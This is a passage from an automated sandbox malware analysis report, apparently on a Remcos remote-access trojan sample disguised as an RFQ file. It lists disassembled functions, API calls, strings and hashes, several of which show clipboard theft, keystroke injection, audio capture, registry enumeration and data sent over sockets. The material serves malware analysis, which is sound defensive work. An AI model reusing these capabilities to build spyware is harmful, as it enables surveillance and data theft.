                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                            • String ID: Remcos
                            • API String ID: 1970332568-165870891
                            • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                            • Instruction ID: a3c1d7bf95fc3ae1ab8e5dc1b7104b29b221ef3087a45b83961503d05de66f2d
                            • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                            • Instruction Fuzzy Hash: 620121B1944348ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                            Function 0044B460 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fa15d67f6967a0586858809eb4f8addb77c2acfc7eddd8ef9b3342f4efd30537
                            • Instruction ID: eb32e44420a9d0dd2d5c4453ebfd120c933f738a1b2f21936dd04ad6d98d905f
                            • Opcode Fuzzy Hash: fa15d67f6967a0586858809eb4f8addb77c2acfc7eddd8ef9b3342f4efd30537
                            • Instruction Fuzzy Hash: 6FC1E670D042499FEF11DFADD8417AEBBB4EF4A304F08405AE814A7392C778D941CBA9
                            Function 00452B3A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                            Download Yara Rule
                            APIs
                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E13,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BE6
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C69
                            • __alloca_probe_16.LIBCMT ref: 00452CA1
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E13,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CFC
                            • __alloca_probe_16.LIBCMT ref: 00452D4B
                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D13
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E13,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D8F
                            • __freea.LIBCMT ref: 00452DBA
                            • __freea.LIBCMT ref: 00452DC6
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                            • String ID:
                            • API String ID: 201697637-0
                            • Opcode ID: 80432d720a632dfc9e5c8c48fa1949e662c4ca6cc91317bc06fdd6919e85f732
                            • Instruction ID: 924e7ddfc51c8ace49a4e982202af340d06b3b5a9b96f94d8290dca04e209d32
                            • Opcode Fuzzy Hash: 80432d720a632dfc9e5c8c48fa1949e662c4ca6cc91317bc06fdd6919e85f732
                            • Instruction Fuzzy Hash: E691C572E002169BDF218E64CA41AEF7BB5AF0A311F14456BEC01E7243D7ADDC49C7A8
                            Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • _memcmp.LIBVCRUNTIME ref: 004446B3
                            • _free.LIBCMT ref: 00444724
                            • _free.LIBCMT ref: 0044473D
                            • _free.LIBCMT ref: 0044476F
                            • _free.LIBCMT ref: 00444778
                            • _free.LIBCMT ref: 00444784
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast$_abort_memcmp
                            • String ID: C
                            • API String ID: 1679612858-1037565863
                            • Opcode ID: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                            • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                            • Opcode Fuzzy Hash: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                            • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                            Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: tcp$udp
                            • API String ID: 0-3725065008
                            • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                            • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                            • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                            • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                            Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                            • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                            • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                              • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                              • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            • Opcode ID: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                            • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                            • Opcode Fuzzy Hash: 66e691a74e7f006358ac760d03bec4908fddb3b051589708aa87838830b58802
                            • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                            Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                              • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                              • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                              • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                            • _wcslen.LIBCMT ref: 0041A906
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                            • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 37874593-703403762
                            • Opcode ID: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                            • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                            • Opcode Fuzzy Hash: 27895bcfed94204bcab943ef82ac12f5f5e023aa0cf9efce9513ccb574d3e45a
                            • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                            Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D574,0043D574,?,?,?,00449BB1,00000001,00000001,1AE85006), ref: 004499BA
                            • __alloca_probe_16.LIBCMT ref: 004499F2
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BB1,00000001,00000001,1AE85006,?,?,?), ref: 00449A40
                            • __alloca_probe_16.LIBCMT ref: 00449AD7
                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                            • __freea.LIBCMT ref: 00449B47
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • __freea.LIBCMT ref: 00449B50
                            • __freea.LIBCMT ref: 00449B75
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 3864826663-0
                            • Opcode ID: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                            • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                            • Opcode Fuzzy Hash: 8c8a116705a4c2baf122adee4ab18fb9808afdf9de7dcd7dac8e0bc8768b82ee
                            • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                            Function 00418ACE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • SendInput.USER32 ref: 00418B18
                            • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                            • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                              • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InputSend$Virtual
                            • String ID:
                            • API String ID: 1167301434-0
                            • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                            • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                            • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                            • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                            Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                            Download Yara Rule
                            APIs
                            • OpenClipboard.USER32 ref: 00415A46
                            • EmptyClipboard.USER32 ref: 00415A54
                            • CloseClipboard.USER32 ref: 00415A5A
                            • OpenClipboard.USER32 ref: 00415A61
                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                            • CloseClipboard.USER32 ref: 00415A89
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                            • String ID:
                            • API String ID: 2172192267-0
                            • Opcode ID: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                            • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                            • Opcode Fuzzy Hash: efbd044eff29c5abb4193f117459f8b4416f238a5e319341b58a3d79a3577e2f
                            • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                            Function 00446169 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16
                            • String ID: a/p$am/pm$fD
                            • API String ID: 3509577899-1143445303
                            • Opcode ID: f4d0e9b01d3a4ebdcf3af06bf21250a010b83dbc2bcce65605334eef29099109
                            • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                            • Opcode Fuzzy Hash: f4d0e9b01d3a4ebdcf3af06bf21250a010b83dbc2bcce65605334eef29099109
                            • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                            Function 00447E4A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00447ECC
                            • _free.LIBCMT ref: 00447EF0
                            • _free.LIBCMT ref: 00448077
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                            • _free.LIBCMT ref: 00448243
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: 8f2632b67193357a83db75d9b5d73d353fce2e4dc276e18d9d86292fc31d1611
                            • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                            • Opcode Fuzzy Hash: 8f2632b67193357a83db75d9b5d73d353fce2e4dc276e18d9d86292fc31d1611
                            • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                            Function 0044F816 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 09cf0cc477e5c3e8c34e3e6528d20f0e7a329f67b25276f7d14d45d58e000a94
                            • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                            • Opcode Fuzzy Hash: 09cf0cc477e5c3e8c34e3e6528d20f0e7a329f67b25276f7d14d45d58e000a94
                            • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                            Function 00443F8B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                            • _free.LIBCMT ref: 00444096
                            • _free.LIBCMT ref: 004440AD
                            • _free.LIBCMT ref: 004440CC
                            • _free.LIBCMT ref: 004440E7
                            • _free.LIBCMT ref: 004440FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID: Z7D
                            • API String ID: 3033488037-2145146825
                            • Opcode ID: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                            • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                            • Opcode Fuzzy Hash: 8c925fd0856db186306c7281cb720ff9f4ffcac0ad0a05797528cb4255118f5a
                            • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                            Function 0044A0D3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044A115
                            • __fassign.LIBCMT ref: 0044A190
                            • __fassign.LIBCMT ref: 0044A1AB
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044A1D1
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                            • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                            • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                            • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                            • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                            Function 00401768 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 142threadCOMMON
                            Download Yara Rule
                            APIs
                            • ExitThread.KERNEL32 ref: 004017F4
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                            • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • __Init_thread_footer.LIBCMT ref: 004017BC
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                            • String ID: T=G$>G$>G
                            • API String ID: 1596592924-1617985637
                            • Opcode ID: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                            • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                            • Opcode Fuzzy Hash: a544d0f604bfa20063d13062b7b3f0a692fa5257fc001f001da1a660e159a4e3
                            • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                            Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                              • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                              • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: TUFTUF$>G$DG$DG
                            • API String ID: 3114080316-344394840
                            • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                            • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                            • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                            • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                            Function 00437A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                            • _ValidateLocalCookies.LIBCMT ref: 00437B51
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                            • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                            • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                            • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                            Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                            • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                            • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                            • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                            Function 00455913 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6057a514b4ba5577cbf71135f50799e40bb9a98b40ca9e941afdb8321a510a32
                            • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                            • Opcode Fuzzy Hash: 6057a514b4ba5577cbf71135f50799e40bb9a98b40ca9e941afdb8321a510a32
                            • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                            Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                            • int.LIBCPMT ref: 0040FC0F
                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
